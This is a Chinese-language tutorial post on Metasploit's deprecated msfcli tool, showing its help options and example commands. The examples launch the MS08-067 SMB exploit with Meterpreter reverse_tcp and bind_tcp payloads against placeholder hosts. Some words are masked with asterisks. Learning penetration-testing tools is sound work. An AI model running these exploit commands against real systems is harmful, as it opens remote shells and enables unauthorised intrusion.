Metasploit（三）--Msfcli命令

原文：《metasploit the pentration tester’s guide》

msfcli命令为方便metasploit框架和其他的shell交互而设计. 2015年6月8号 被弃用了

root@xxoo:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================
Mode Description

—- ———–

(A)dvanced Show available advanced options for this module #显示该模块的所有高级配置选项
(AC)tions Show available actions for this auxiliary module #显示辅助模块的所有可用动作
(C)heck Run the check routine of the selected module #运行选定模块的检查例程
(E)xecute Execute the selected module #运行选定的模块
(H)elp You’re looking at it baby! #帮助信息

(I)DS Evasion Show available ids evasion options for this module #显示该模块的可用IDS逃逸选项(O)ptions Show available options for this module #显示所有配置选项
(P)ayloads Show available payloads for this module #显示该模块适用的***载荷
(S)ummary Show information about this module #显示关于该模块详细信息
(T)argets Show available targets for this exploit module #显示******模块的所有***目标类型

查看某一个exploit的options :
root@xxoo:~# msfcli windows/smb/ms08_067_netapi O

设置options 同时显示payloads的命令如下:
root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 P

设置好options,payloads然后执行exploit的命令如下:
root@xxoo:~# msfcli windows/smb/ms08_067_netapi
RHOST=www.xx.com PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=xxoo E

root@xxoo:~# msfcli | grep exploit
仅列出******模块。

root@xxoo:~# msfcli | grep exploit/windows
仅列出与windows相关的******模块。

root@xxoo:~# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
对IP发起ms08_067_netapi******，配置了bind_tcp***载荷，并绑定在PORT端口进行监听。